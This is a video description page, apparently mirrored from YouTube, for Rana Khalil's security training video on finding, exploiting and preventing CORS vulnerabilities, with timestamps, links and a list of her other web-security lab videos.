Cross-Origin Resource Sharing (CORS) | Complete Guide
In this video, we cover the theory behind Cross-Origin Resource Sharing (CORS) vulnerabilities, how to find these types of vulnerabilities from both a white box and black box perspective, how to exploit them and how to prevent them.
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: https://bit.ly/30LWAtE
▬ 📖 Contents of this video 📖 ▬▬▬▬▬▬▬▬▬▬
00:00 - Introduction
00:31 - Web Security Academy Course (https://bit.ly/30LWAtE)
01:42 - Agenda
02:30 – What is a CORS vulnerability?
33:35 – How to find CORS vulnerabilities?
42:37 – How to exploit CORS vulnerabilities?
50:25 – How to prevent CORS vulnerabilities?
51:47 – Resources
52:00 - Thank You
▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
Video slides: https://github.com/rkhal101/Web-Security-Academy-Series/blob/main/cors/theory/CORS%20Complete%20Guide%20Theory%20Video%20Slides.pdf
Web Security Academy: https://portswigger.net/web-security/cors
Rana's Twitter account: https://twitter.com/rana__khalil
Hacker Icons made by Freepik: https://www.freepik.com
Видео Cross-Origin Resource Sharing (CORS) | Complete Guide канала Rana Khalil
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: https://bit.ly/30LWAtE
▬ 📖 Contents of this video 📖 ▬▬▬▬▬▬▬▬▬▬
00:00 - Introduction
00:31 - Web Security Academy Course (https://bit.ly/30LWAtE)
01:42 - Agenda
02:30 – What is a CORS vulnerability?
33:35 – How to find CORS vulnerabilities?
42:37 – How to exploit CORS vulnerabilities?
50:25 – How to prevent CORS vulnerabilities?
51:47 – Resources
52:00 - Thank You
▬ 🔗 Links 🔗 ▬▬▬▬▬▬▬▬▬▬
Video slides: https://github.com/rkhal101/Web-Security-Academy-Series/blob/main/cors/theory/CORS%20Complete%20Guide%20Theory%20Video%20Slides.pdf
Web Security Academy: https://portswigger.net/web-security/cors
Rana's Twitter account: https://twitter.com/rana__khalil
Hacker Icons made by Freepik: https://www.freepik.com
Видео Cross-Origin Resource Sharing (CORS) | Complete Guide канала Rana Khalil
Показать
Комментарии отсутствуют
Информация о видео
Другие видео канала
Business Logic Vulnerabilities - Lab #2 High-level logic vulnerability | Long Version
Authentication Vulnerabilities - Lab #9 Brute-forcing a stay-logged-in cookie | Short Version
Business Logic Vulnerabilities - Lab #1 Excessive trust in client-side controls | Long Version
Authentication Vulnerabilities - Lab #12 Password brute-force via password change | Short Version
Authentication Vulnerabilities - Lab #6 Broken brute-force protection, IP block | Short Version
SQL Injection - Lab #7 SQL injection attack, querying the database type and version on Oracle
Business Logic Vulnerabilities - Lab #7 Weak isolation on dual-use endpoint | Long Version
Authentication Vulnerabilities - Lab #8 2FA broken logic | Short Version
Business Logic Vulnerabilities - Lab #5 Low Level Logic Flaw | Short Video
Business Logic Vulnerabilities - Lab #6 Inconsistent handling of exceptional input | Short Video
Business Logic Vulnerabilities - Lab #4 Flawed enforcement of business rule | Short Version
Business Logic Vulnerabilities - Lab #7 Weak isolation on dual-use endpoint | Short Version
Command Injection - Lab #3 Blind OS command injection with output redirection | Long Version
SQL Injection - Lab #15 Blind SQL injection with out-of-band interaction
Directory Traversal - Lab #5 File path traversal, validation of start of path | Long Version
CORS - Lab #4 CORS vulnerability with internal network pivot attack | Long Video
Business Logic Vulnerabilities - Lab #3 Inconsistent security controls | Long Version
Broken Access Control - Lab #12 Multi-step process with no access control on one step | Long Version
Broken Access Control - Lab #2 Unprotected admin functionality with unpredictable URL | Long Version
Authentication Vulnerabilities - Lab #9 Brute-forcing a stay-logged-in cookie | Long Version
Authentication Vulnerabilities - Lab #5 Username enumeration via response timing | Long Version